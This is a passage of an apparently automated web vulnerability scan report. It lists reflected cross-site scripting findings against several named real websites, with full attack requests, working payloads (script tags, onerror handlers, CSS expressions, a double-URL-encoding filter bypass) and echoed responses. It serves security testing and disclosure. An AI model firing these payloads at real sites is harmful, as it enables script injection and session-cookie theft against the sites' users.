The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d0c5"><script>alert(1)</script>4b948308b21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Ideas/Events/EventArchive.aspx?5d0c5"><script>alert(1)</script>4b948308b21=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:44:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 92673


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?5d0c5"><script>alert(1)</script>4b948308b21=1&pg=1">
...[SNIP]...

4.93. http://www.deweyleboeuf.com/en/Ideas/InTheNews.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Ideas/InTheNews.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5044b"><script>alert(1)</script>1fae55877d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Ideas/InTheNews.aspx?5044b"><script>alert(1)</script>1fae55877d0=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:43:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 77557


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?5044b"><script>alert(1)</script>1fae55877d0=1&pg=1">
...[SNIP]...

4.94. http://www.deweyleboeuf.com/en/Ideas/Publications/AttorneyArticles.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Ideas/Publications/AttorneyArticles.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7176a"><script>alert(1)</script>129891fa40c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Ideas/Publications/AttorneyArticles.aspx?7176a"><script>alert(1)</script>129891fa40c=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:43:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 77733


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?7176a"><script>alert(1)</script>129891fa40c=1&pg=1">
...[SNIP]...

4.95. http://www.diggita.it/submit.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diggita.it
Path:   /submit.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fce1b"><script>alert(1)</script>c501a948188 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit.phpfce1b"><script>alert(1)</script>c501a948188 HTTP/1.1
Host: www.diggita.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:21:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=67c03560314d0d10e9be0bd654435e86; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25421


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it" xmlns:fb
...[SNIP]...
<fb:login-button v="2" onlogin="window.location.href='/modules/fb/login.php?return=/submit.phpfce1b"><script>alert(1)</script>c501a948188'">
...[SNIP]...

4.96. http://www.diggita.it/submit.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diggita.it
Path:   /submit.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ffb6"><script>alert(1)</script>5c2ce711f18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /submit.php?5ffb6"><script>alert(1)</script>5c2ce711f18=1 HTTP/1.1
Host: www.diggita.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:21:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=ccd9b1d9e9471da4ea8841848718301e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 26642


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it" xmlns:fb
...[SNIP]...
<fb:login-button v="2" onlogin="window.location.href='/modules/fb/login.php?return=/login.php?return=/submit.php?5ffb6"><script>alert(1)</script>5c2ce711f18=1'">
...[SNIP]...

4.97. http://www.embarkons.com/sharer.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 12956<img%20src%3da%20onerror%3dalert(1)>9574d4dbe79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12956<img src=a onerror=alert(1)>9574d4dbe79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/12956<img%20src%3da%20onerror%3dalert(1)>9574d4dbe79 HTTP/1.1
Host: www.embarkons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:50 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=oe5lalcmiqfs2uf70pbbndtm97; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:14:50 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">12956<img src=a onerror=alert(1)>9574d4dbe79</div>
...[SNIP]...

4.98. http://www.embarkons.com/sharer.php/a [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/a

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 87967<img%20src%3da%20onerror%3dalert(1)>88c35fcade8 was submitted in the REST URL parameter 2. This input was echoed as 87967<img src=a onerror=alert(1)>88c35fcade8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/a87967<img%20src%3da%20onerror%3dalert(1)>88c35fcade8 HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:50 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:51 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">a87967<img src=a onerror=alert(1)>88c35fcade8</div>
...[SNIP]...

4.99. http://www.embarkons.com/sharer.php/images/close-icon.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/close-icon.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4bc6e<img%20src%3da%20onerror%3dalert(1)>2f3138d923a was submitted in the REST URL parameter 3. This input was echoed as 4bc6e<img src=a onerror=alert(1)>2f3138d923a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/images/close-icon.gif4bc6e<img%20src%3da%20onerror%3dalert(1)>2f3138d923a HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:53 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">close-icon.gif4bc6e<img src=a onerror=alert(1)>2f3138d923a</div>
...[SNIP]...

4.100. http://www.embarkons.com/sharer.php/images/postit-bulb.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/postit-bulb.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6be61<img%20src%3da%20onerror%3dalert(1)>314a004caad was submitted in the REST URL parameter 3. This input was echoed as 6be61<img src=a onerror=alert(1)>314a004caad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/images/postit-bulb.gif6be61<img%20src%3da%20onerror%3dalert(1)>314a004caad HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:52 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:53 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">postit-bulb.gif6be61<img src=a onerror=alert(1)>314a004caad</div>
...[SNIP]...

4.101. http://www.embarkons.com/sharer.php/images/postitsubmitbtn.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/postitsubmitbtn.png

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4ef80<img%20src%3da%20onerror%3dalert(1)>f6413b1c94b was submitted in the REST URL parameter 3. This input was echoed as 4ef80<img src=a onerror=alert(1)>f6413b1c94b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/images/postitsubmitbtn.png4ef80<img%20src%3da%20onerror%3dalert(1)>f6413b1c94b HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:53 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">postitsubmitbtn.png4ef80<img src=a onerror=alert(1)>f6413b1c94b</div>
...[SNIP]...

4.102. http://www.embarkons.com/sharer.php/images/search-con.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/search-con.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e1832<img%20src%3da%20onerror%3dalert(1)>f94e94396e was submitted in the REST URL parameter 3. This input was echoed as e1832<img src=a onerror=alert(1)>f94e94396e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/images/search-con.gife1832<img%20src%3da%20onerror%3dalert(1)>f94e94396e HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:54 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">search-con.gife1832<img src=a onerror=alert(1)>f94e94396e</div>
...[SNIP]...

4.103. http://www.embarkons.com/sharer.php/src/captcha.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/src/captcha.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 57a50<img%20src%3da%20onerror%3dalert(1)>9823491c1f8 was submitted in the REST URL parameter 3. This input was echoed as 57a50<img src=a onerror=alert(1)>9823491c1f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/src/captcha.php57a50<img%20src%3da%20onerror%3dalert(1)>9823491c1f8 HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:58 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:58 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">captcha.php57a50<img src=a onerror=alert(1)>9823491c1f8</div>
...[SNIP]...

4.104. http://www.embarkons.com/sharer.php/src/captcha.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/src/captcha.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4c1f1<img%20src%3da%20onerror%3dalert(1)>7a467385bc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4c1f1<img src=a onerror=alert(1)>7a467385bc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/src/captcha.php/4c1f1<img%20src%3da%20onerror%3dalert(1)>7a467385bc8 HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:55 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:55 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">4c1f1<img src=a onerror=alert(1)>7a467385bc8</div>
...[SNIP]...

4.105. http://www.favlog.de/submit.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.favlog.de
Path:   /submit.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b394"%20style%3dx%3aexpression(alert(1))%203927ed65879 was submitted in the REST URL parameter 1. This input was echoed as 4b394\" style=x:expression(alert(1)) 3927ed65879 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /submit.php4b394"%20style%3dx%3aexpression(alert(1))%203927ed65879 HTTP/1.1
Host: www.favlog.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:15:17 GMT
Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k mod_jk/1.2.26 PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=9ccdeh3nqm7lod25rvsqul5or5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18450


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
<a href="/upcoming/submit.php4b394\" style=x:expression(alert(1)) 3927ed65879">
...[SNIP]...

4.106. http://www.gabbr.com/submit/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gabbr.com
Path:   /submit/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 48e8d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3a4c354593 was submitted in the REST URL parameter 1. This input was echoed as 48e8d</title><script>alert(1)</script>c3a4c354593 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /submit48e8d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3a4c354593/ HTTP/1.1
Host: www.gabbr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:58 GMT
